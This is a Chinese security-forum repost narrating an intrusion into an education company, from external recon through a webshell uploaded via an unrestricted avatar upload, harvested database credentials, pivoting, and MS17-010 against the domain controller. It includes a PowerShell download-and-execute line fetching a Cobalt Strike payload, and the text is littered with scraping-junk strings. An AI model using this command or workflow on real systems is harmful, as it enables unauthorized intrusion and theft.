找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3686|回复: 0
打印 上一主题 下一主题

渗透实战 | 从外网直接打到内网全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2024-3-1 19:41:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

) J2 T) t0 E U3 _ 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路 . \: U% l! W0 o% z7 n1 m$ r6 {

; a5 Y8 E( r& b/ E3 J& b

/ F1 w8 `# g' k8 `. |  + m& K9 D6 G$ O1 ~2 |; E% s

$ D& j5 [5 c# o8 h

" w' i% p5 N" d1 Y0 K 正文 . I4 }/ j6 J! Z- H9 X7 Q% U

3 }# W1 Q: u, E

8 _; e2 w) m2 I. U$ [  1 K; d4 }* E5 V& d# ?% ^

; S& `# Z1 D0 J* t3 g

$ B" B3 P+ k* t* m7 W 目标:www.xxxx.com(一家教育机构)
0 v+ P" i3 N) T& ~% H
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
' z2 X" Y. M+ Q, v& D

( ?% O9 |, a' }9 U$ `

9 h+ P* ]% z! y1 m8 h vshapes= 6 X, w6 F& @; M. F$ x% E) w7 o

% g: P* [5 X7 `9 V

3 H2 h9 w) ^& k& h' N 进行了简单的信息搜集
% \+ c9 Q0 \* Y
8 \" |6 o# @- y
+ X- u* r# Q0 M, o/ x0 I

4 z6 K/ S3 {2 a* _. e+ Z

8 O2 _' `& o! M 子域名搜集 + N2 S6 F/ l7 M1 f

( F* ?; A+ ^+ Q2 H9 P$ D6 Z- {2 ^

r5 p, ~1 I! k0 e$ x# P vshapes=: g0 X/ w9 H/ F; P

, |" U" s0 V% R* W

" B: S2 o7 w+ e# L fofa找资产
- C+ l1 L# g( Q" S7 Q" L7 X G
& T$ {9 L/ [1 F1 g
, v# C$ E+ {# Y ^1 M

8 v7 ~$ V; E3 c; _) s9 J. Z e0 X

+ F1 x- {( D1 u% e! A1 p$ i) o vshapes=* ~7 J& A% W/ \

8 |9 n1 v3 N! H4 o! Y6 M+ T

8 D, ]) n4 I' N 一共七个资产。去重之后只有两个。
$ O3 ~1 |' `) S+ y! ~+ R( j7 z
+ m3 s9 U+ A0 K& C1 Q9 R, n3 Q
4 N7 h" W3 n" \+ l

# l4 I% V* V9 n' l k }. ~; m

$ r" F) R& n* N0 b7 n8 B, q 目录探测% ~! F# [1 q3 i' v o$ k* M

( x( \" H. D: G, F3 T! j

2 m7 a+ H; l x; V/ g9 l! q& d, F7 W vshapes=4 Q2 [! ~. H3 [# m1 F

: t. g: W4 J' r' Z M

. ^! v4 J7 x" ^5 W9 d; D- C 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
7 P, G$ H' x* [
' K" |/ y3 U1 N+ a6 `; X
" i& h8 m2 M( b$ k j* v+ v

1 |8 T D5 P& {$ M' @: ?: A

$ r4 F H2 n" Y% u% j* G 我又尝试了通过修改返回包来绕过登录界面 ! i2 u$ V1 H% H, H$ V8 q0 G! }' y

% D# K- C) |- d* z2 L

! E7 f5 `$ ?& v4 w4 n; M vshapes= 0 U4 [. t- g4 S/ b7 K% H

1 h# q" F L5 W% y1 F& J% `

6 k& O2 j7 y; Z 还是不行,尝试注入无果 ( t% G8 D9 T# T2 y' H

7 D4 l" r& T4 U( I1 z# c: W4 V

) k5 _: ]8 b! ?% W+ ? vshapes= / S2 n4 O; T& L% j

4 ]7 k. C/ I1 k7 D5 C

: q" o% |5 a* W( s% |9 j 不过我目录探测出了一处Spring信息泄露
' X8 D% e% f4 x3 x& c
# p Z- d( v% w0 f
# N5 c0 w8 R3 P1 P3 X: L

- Q) F3 A2 M+ ~( y

- S* X0 Q _3 G vshapes=' a( L4 z! ~" C* [+ G' T

' k( j" w# F! }8 `

7 _! O1 r. J, i, I: x7 E 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录 ' B0 y. ?6 Q d3 c# i9 H

7 C( H) B$ c a$ o

# Y8 d# W! ^7 Z vshapes= : y* J# K6 R. C" s4 V) R* W

/ A5 M/ m1 Z' i! D

1 U/ d0 ~$ @8 u9 a% c 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。+ h7 |# _+ p' E w

# `# w0 F, _8 q

; K( @' j9 r/ U5 `. a vshapes=) t, V S, e) T: ]

" e2 R% @" T v& e( _; r

# e" p9 ?8 f$ j/ u 获取有些师傅到这一步就手机抓包电脑测了。* E% K1 e( v# t

" \3 B; P- ^: }, c& M$ g0 q8 l

# k" |- H% H l2 y. S Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。/ y1 E! Q4 u* ]

% k( d* N" T/ B4 L

2 v$ y- ?. d s6 W6 \3 L 其中在一个公众号发现了小程序,可以进行注册。 ) y. M! G0 ^( \( I; d2 {( d) v

@5 S! d( T! C. E4 j

) N0 E6 m3 L, S& V) n6 f 看到了头像上传,尝试上传获取WebShell" O. v& {- N( T" @2 c4 e

6 l6 p& O0 S& I/ z5 C' O2 U+ u+ w) b

6 P! \+ {; F5 O6 o vshapes= 5 m2 D3 B5 [3 \- k

$ e) \: ^2 j# M X# C

* M9 O) l/ X/ ?! g9 H 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问" W6 V/ C4 _9 q

~2 s" c/ Q) l+ i* {6 S9 l: [

0 @+ p: ?9 E. ~ vshapes=) v7 |. G! G; H- Z

" E5 ?5 _2 s8 d3 z p/ E

# ]% e- T) @: M* o1 E1 g 然后上了大马 + D! A2 ]/ {* m: Y* O- _9 p' D: g

: O$ P% l/ K# P k' S/ ~

0 m+ ~ z/ k v1 T8 O1 E vshapes= 4 I4 |: \1 k* k0 y8 q

; o" L% j. D$ \1 m M

3 @ Q* z& ~; c. V) u% L vshapes= 2 a% R: e# h* N: ?. E

. }( R" [& D) Y5 d/ n. u- H4 o

: b' {( V+ m% B7 t6 \" z: c2 v3 E4 m 通过翻找文件发现数据库账号密码 / E" M' T K% v" b; a' M3 F9 C

6 a' H9 e8 b0 z: t4 i4 n

2 B7 W- E- ]- D vshapes=- _% h/ s# _! U! P

5 V' N! { i7 w8 u _

3 Y3 v; J' W% G; J% }5 h --内网渗透, d; ]& e, _$ o0 a; j/ ^

9 L W ?' _; g# g9 a2 B# H

; V9 a+ ?. c) E( A6 M 直接通过powershell执行 cs上线 ) z- R1 J/ Z! x# ^2 Z5 X a% B

* D! m/ T1 n6 A

1 l' y4 l: D+ p; b- K1 P powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" B; @& d- Q% y" n; B$ S

( B3 q5 G% q+ y5 K" D5 f

% ~ N3 g8 |# G, d7 t vshapes=" E* n L3 W% U2 S8 m, d t

4 S: [* H! T1 Z8 @6 t$ G4 k

, n7 o- j, Y# E& O# a 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 z# O) v) K$ b# l/ d) l0 @, n6 R

j6 N- a- A6 e# C. s5 \- h+ Q. e

- [1 f+ U0 e& ] vshapes= ! i/ w8 ]1 q! j6 l+ a

8 ]6 f1 M3 Y0 h- a

2 o+ H6 l0 p: l 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
5 L; U. q! [0 H7 m# L$ E
2 n: f1 q* @ y( Q5 |
4 L3 B9 p# e8 R; H. F! H2 G
8 N Y# C9 ` B

- \* S) F4 a$ H7 f4 p% W/ T, X

E, r, z) j [5 D vshapes= ! b- E1 F, ?" G2 J* l7 E6 P W

$ Y2 y1 m; _' ?3 ^4 p! f

2 _. \& z* H0 w 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
! Z; S5 ^& M- ^- ?0 A, k1 |, C' ~
0 G: D# N5 s7 r. T8 T2 F
$ v0 p. I/ |1 T5 O4 `& N0 B4 V

8 `6 {# k+ K* `- ]

8 t1 v1 F, ^. J" i" L" ]6 d+ |/ N( ] vshapes= 5 V1 H+ p& [: U/ a$ L8 g e- k* Z5 h

; s6 a# Y. q* `4 K: [: ^* W7 g

1 j" q4 N+ E/ V' }+ S5 \" [$ @% L+ ~0 I
# u* H5 Q3 q( t- Q
; u8 I |4 h9 [
- ?% c" k# ~, B5 V

9 {+ K0 z4 w; I0 k$ k" I" X: i- T

) T( |: X& t( R- m" ]) w, P" Z+ x2 C  1 Z3 n! l" Y2 E( S0 O0 N

7 F# ]# p* c- G. U6 ^& D# g G

* t( h0 W$ W! j 小结 9 n2 U0 `; s7 K

6 f( e: G- ~( x- e3 X' V+ b

9 d( o9 Z d/ h  ; r* V7 ]2 t8 ~5 T- G

( p# H& E/ Z0 ?( v1 F7 v2 a

1 a' |# |; l. b$ H0 M$ v; | U 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!" H: `3 b0 d0 u

2 X4 T5 u, h' V9 l

; _3 X7 Y7 Y9 U4 V3 b1 w' r1 m  # |. D g9 b& D+ r- j0 j

- F" p! R5 H8 {3 j( g. y
    / g% E$ d2 ~1 m6 u1 C
  • 2 g. {) r2 c. |! ~- ?/ n: E   ! M4 i5 r0 J" r, L. l
  • 0 A' ~* Q4 d$ v) k" C" Z3 z" G
  • $ B& r. r* L+ w+ U$ A  9 |) I' R& {1 Y0 k/ b s
  • 4 Z8 V, y" v0 l
7 g% g* X/ [7 l$ P/ a

/ I( T+ {" x, P) [* p+ \8 H4 k 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html * [; m; F$ k% K' _! [$ d

( l% A3 @1 M6 W; `" b% \+ P' Z

" v& T6 E% l2 X' j) n   5 Z( v* f) R, {/ h

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表